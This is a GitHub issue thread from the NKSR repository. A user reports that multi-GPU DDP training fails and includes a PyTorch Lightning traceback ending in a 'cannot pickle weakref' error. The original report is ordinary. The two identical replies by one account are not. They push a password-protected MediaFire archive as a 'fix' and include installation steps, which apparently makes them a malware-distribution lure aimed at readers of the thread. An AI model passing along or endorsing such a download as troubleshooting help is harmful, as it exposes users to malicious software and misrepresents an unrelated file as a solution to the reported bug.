### ISSUE TITLE
How to accelerate training with multiple gpu?

### ISSUE THREAD

**Issue by xindeng98** [nv-tlabs/NKSR#77]
Thank you very much for your work. I have made a slight modification to the network structure based on your implementation. However, I am encountering an issue with the training speed on a single GPU, which is too slow to validate my idea quickly.

I noticed that ddp are provided in the ZEUS_DL.md file. Unfortunately, when I attempt to use the following command, I encounter an error, even when using the original nksr codebase:
`CUDA_VISIBLE_DEVICES=0,1,2,3 python train.py configs/carla/train.yaml --logger_type wandb --wname ddp_test --gpus 4 --batch_size 4`

Error :

/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/pytorch_lightning/trainer/connectors/data_connector.py:208: UserWarning: num_workers>0, persistent_workers=False, and strategy=ddp_spawn may result in data loading bottlenecks. Consider setting persistent_workers=True (this is a limitation of Python .spawn() and PyTorch)
  rank_zero_warn(
Epoch 0:   0%|                                                                                                                                                    | 0/1068 [00:00<?, ?it/s]Traceback (most recent call last):
  File "/media/SSD0/xindeng/nksr/train.py", line 279, in <module>
    trainer.fit(net_model, ckpt_path=last_ckpt_path)
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/pytorch_lightning/trainer/trainer.py", line 608, in fit
    call._call_and_handle_interrupt(
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/pytorch_lightning/trainer/call.py", line 36, in _call_and_handle_interrupt
    return trainer.strategy.launcher.launch(trainer_fn, *args, trainer=trainer, **kwargs)
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/pytorch_lightning/strategies/launchers/multiprocessing.py", line 113, in launch
    mp.start_processes(
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/torch/multiprocessing/spawn.py", line 197, in start_processes
    while not context.join():
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/torch/multiprocessing/spawn.py", line 160, in join
    raise ProcessRaisedException(msg, error_index, failed_process.pid)
torch.multiprocessing.spawn.ProcessRaisedException: 

-- Process 2 terminated with the following error:
Traceback (most recent call last):
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/torch/multiprocessing/spawn.py", line 69, in _wrap
    fn(i, *args)
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/pytorch_lightning/strategies/launchers/multiprocessing.py", line 139, in _wrapping_function
    results = function(*args, **kwargs)
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/pytorch_lightning/trainer/trainer.py", line 650, in _fit_impl
    self._run(model, ckpt_path=self.ckpt_path)
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/pytorch_lightning/trainer/trainer.py", line 1112, in _run
    results = self._run_stage()
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/pytorch_lightning/trainer/trainer.py", line 1191, in _run_stage
    self._run_train()
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/pytorch_lightning/trainer/trainer.py", line 1214, in _run_train
    self.fit_loop.run()
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/pytorch_lightning/loops/loop.py", line 199, in run
    self.advance(*args, **kwargs)
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/pytorch_lightning/loops/fit_loop.py", line 267, in advance
    self._outputs = self.epoch_loop.run(self._data_fetcher)
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/pytorch_lightning/loops/loop.py", line 194, in run
    self.on_run_start(*args, **kwargs)
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/pytorch_lightning/loops/epoch/training_epoch_loop.py", line 160, in on_run_start
    _ = iter(data_fetcher)  # creates the iterator inside the fetcher
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/pytorch_lightning/utilities/fetching.py", line 179, in __iter__
    self._apply_patch()
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/pytorch_lightning/utilities/fetching.py", line 120, in _apply_patch
    apply_to_collections(self.loaders, self.loader_iters, (Iterator, DataLoader), _apply_patch_fn)
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/pytorch_lightning/utilities/fetching.py", line 156, in loader_iters
    return self.dataloader_iter.loader_iters
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/pytorch_lightning/trainer/supporters.py", line 556, in loader_iters
    self._loader_iters = self.create_loader_iters(self.loaders)
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/pytorch_lightning/trainer/supporters.py", line 596, in create_loader_iters
    return apply_to_collection(loaders, Iterable, iter, wrong_dtype=(Sequence, Mapping))
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/lightning_utilities/core/apply_func.py", line 52, in apply_to_collection
    return _apply_to_collection_slow(
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/lightning_utilities/core/apply_func.py", line 96, in _apply_to_collection_slow
    return function(data, *args, **kwargs)
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/torch/utils/data/dataloader.py", line 442, in __iter__
    return self._get_iterator()
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/torch/utils/data/dataloader.py", line 388, in _get_iterator
    return _MultiProcessingDataLoaderIter(self)
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/site-packages/torch/utils/data/dataloader.py", line 1043, in __init__
    w.start()
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/multiprocessing/process.py", line 121, in start
    self._popen = self._Popen(self)
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/multiprocessing/context.py", line 224, in _Popen
    return _default_context.get_context().Process._Popen(process_obj)
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/multiprocessing/context.py", line 288, in _Popen
    return Popen(process_obj)
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/multiprocessing/popen_spawn_posix.py", line 32, in __init__
    super().__init__(process_obj)
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/multiprocessing/popen_fork.py", line 19, in __init__
    self._launch(process_obj)
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/multiprocessing/popen_spawn_posix.py", line 47, in _launch
    reduction.dump(process_obj, fp)
  File "/media/SSD0/xindeng/miniconda3/envs/nksr/lib/python3.10/multiprocessing/reduction.py", line 60, in dump
    ForkingPickler(file, protocol).dump(obj)
TypeError: cannot pickle 'weakref.ReferenceType' object

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
